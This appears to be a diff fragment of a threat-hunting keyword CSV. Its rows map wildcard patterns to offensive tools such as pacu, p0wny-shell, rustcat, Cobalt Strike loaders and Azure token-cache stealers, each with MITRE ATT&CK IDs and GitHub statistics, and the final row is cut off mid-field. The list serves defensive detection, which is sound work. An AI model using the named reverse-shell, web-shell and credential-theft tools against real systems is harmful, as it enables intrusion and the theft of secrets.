5000:5000 pador_vuln_server*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" "*P0cL4bs*","offensive_tool_keyword","Github Username","github repo name hosting lots of exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/P0cL4bs","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*p0dalirius/Coercer*","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","6","535","53","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" -"*p0dalirius/Coercer*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*p0dalirius/ExtractBitlockerKeys*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","170","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" -"*p0dalirius/LDAPWordlistHarvester*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","218","14","2023-10-01T21:12:10Z","2023-09-22T10:10:10Z" +"*p0dalirius/Coercer*","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","6","536","53","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" +"*p0dalirius/Coercer*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*p0dalirius/ExtractBitlockerKeys*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" +"*p0dalirius/LDAPWordlistHarvester*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","221","14","2023-10-04T19:01:55Z","2023-09-22T10:10:10Z" "*p0dalirius/pyLAPS*","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","N/A","9","1","50","9","2023-10-01T19:17:01Z","2021-10-05T18:35:21Z" "*p0f -i eth* -p*","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*p0f/p0f.fp*","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*p0wnedShell*","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","10","1488","363","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z" -"*p0wny-shell*","offensive_tool_keyword","p0wny-shell","p0wny@shell:~# is a very basic. single-file. PHP shell. It can be used to quickly execute commands on a server when pentesting a PHP application. Use it with caution: this script represents a security risk for the server.","T1059 - T1027 - T1053 - T1035 - T1105","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/flozz/p0wny-shell","1","1","N/A","N/A","10","1578","620","2023-08-10T15:54:47Z","2016-11-09T20:41:01Z" +"*p0wny-shell*","offensive_tool_keyword","p0wny-shell","p0wny@shell:~# is a very basic. single-file. PHP shell. It can be used to quickly execute commands on a server when pentesting a PHP application. Use it with caution: this script represents a security risk for the server.","T1059 - T1027 - T1053 - T1035 - T1105","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/flozz/p0wny-shell","1","1","N/A","N/A","10","1579","620","2023-08-10T15:54:47Z","2016-11-09T20:41:01Z" "*p3nt4/Nuages*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*P4wnP1*","offensive_tool_keyword","P4wnP1","P4wnP1 is a highly customizable USB attack platform. based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W (required for HID backdoor).","T1200 - T1056.001 - T1059.003 - T1547.001","TA0002 - TA0003 - TA0004","N/A","N/A","Network Exploitation tools","https://github.com/RoganDawes/P4wnP1","1","1","N/A","N/A","10","3768","667","2019-10-31T12:30:16Z","2017-02-22T14:34:09Z" "*P8CuaPrgwBjunvZxJcgq*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" -"*pack_py_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*pack_py_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*package externc2*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" -"*package_cvs_into_lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" -"*package=impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*PackMyPayload.py*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","726","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" -"*PackMyPayload-master*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","726","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" -"*pacu --exec *","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*pacu --list-modules*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*pacu --module-args=*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*pacu --module-info*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*pacu --module-name *","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*pacu --session *","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*pacu --set-regions *","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*pacu --whoami*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*pacu/core pacu*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*pacu/last_update.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*pacu-master.zip*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*padlock2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*package_cvs_into_lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*package=impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*PackMyPayload.py*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","729","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" +"*PackMyPayload-master*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","729","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" +"*pacman -S rustcat*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*pacu --exec *","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu --list-modules*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu --module-args=*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu --module-info*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu --module-name *","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu --session *","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu --set-regions *","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu --whoami*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu/core pacu*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu/last_update.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pacu-master.zip*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*padlock2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*padre -u *http*://*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" "*padre-master.zip*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","1","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" "*papacat -l -p *","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","260","25","2023-03-30T06:22:24Z","2021-05-11T06:26:10Z" @@ -14506,25 +14672,25 @@ "*parrotsec.org/download/*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Parrot-security-*.iso*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*parse_aggressor_properties*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" -"*parse_nessus_file*","offensive_tool_keyword","crackmapexec","function name from nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*parse_nmap_xml*","offensive_tool_keyword","crackmapexec","function name from nmap.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*parse_nessus_file*","offensive_tool_keyword","crackmapexec","function name from nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*parse_nmap_xml*","offensive_tool_keyword","crackmapexec","function name from nmap.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*parse_shellcode*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z" "*ParseMSALCache*.azure\msal_token_cache.bin*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 